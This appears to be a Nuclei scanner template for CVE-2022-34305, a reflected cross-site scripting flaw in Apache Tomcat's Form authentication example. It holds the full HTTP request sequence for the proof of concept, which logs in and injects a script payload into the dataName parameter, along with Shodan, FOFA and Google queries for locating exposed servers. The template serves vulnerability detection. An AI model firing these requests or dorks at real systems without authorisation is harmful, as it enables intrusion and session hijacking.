Apache Tomcat 8.5.50 to 8.5.81, 9.0.30 to 9.0.64, 10.0.0-M1 to 10.0.22, and 10.1.0-M1 to 10.1.0-M16 contain a reflected cross-site scripting caused by displaying unfiltered user data in the Form authentication example, letting attackers execute scripts in victim browsers, exploit requires attacker to craft malicious input.
PoC代码[已公开]
id: CVE-2022-34305
info:
name: Apache Tomcat Examples Web Application - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Apache Tomcat 8.5.50 to 8.5.81, 9.0.30 to 9.0.64, 10.0.0-M1 to 10.0.22, and 10.1.0-M1 to 10.1.0-M16 contain a reflected cross-site scripting caused by displaying unfiltered user data in the Form authentication example, letting attackers execute scripts in victim browsers, exploit requires attacker to craft malicious input.
impact: |
Attackers can execute malicious scripts in victim browsers, leading to session hijacking, defacement, or redirection.
remediation: |
Update to the latest version of Apache Tomcat where this issue is fixed.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2022-34305
- https://github.com/zeroc00I/CVE-2022-34305
- https://lists.apache.org/thread/k04zk0nq6w57m72w5gb0r6z9ryhmvr4k
- https://security.gentoo.org/glsa/202208-34
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34305
cwe-id: CWE-79
epss-score: 0.21613
epss-percentile: 0.95537
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: apache
product: tomcat
shodan-query:
- cpe:"cpe:2.3:a:apache:tomcat"
- http.component:"apache tomcat"
fofa-query: body="apache tomcat"
google-query: site:*/examples/jsp/snp/snoop.jsp
tags: cve,cve2022,xss,apache,tomcat,authenticated,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /examples/jsp/security/protected/index.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: jsessionid_form
group: 1
regex:
- "action='j_security_check;jsessionid=([A-Z0-9]+)'"
internal: true
- raw:
- |
POST /examples/jsp/security/protected/j_security_check;jsessionid={{jsessionid_form}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}
- |
GET /examples/jsp/security/protected/index.jsp?dataName=%3Cscript%3Ealert(document.domain)%3C/script%3E&dataValue=demo HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and
# digest: 4a0a00473045022100e1fa6a06c96d0eb1bf1470561193288734aac6b011c2506a7dee206ce631db0e022068efb52b957b9bbb2cbd587433ac20a254cb7987c7151445fb59a228f1ee94bf:922c64590222798bb761d5b6d8e72950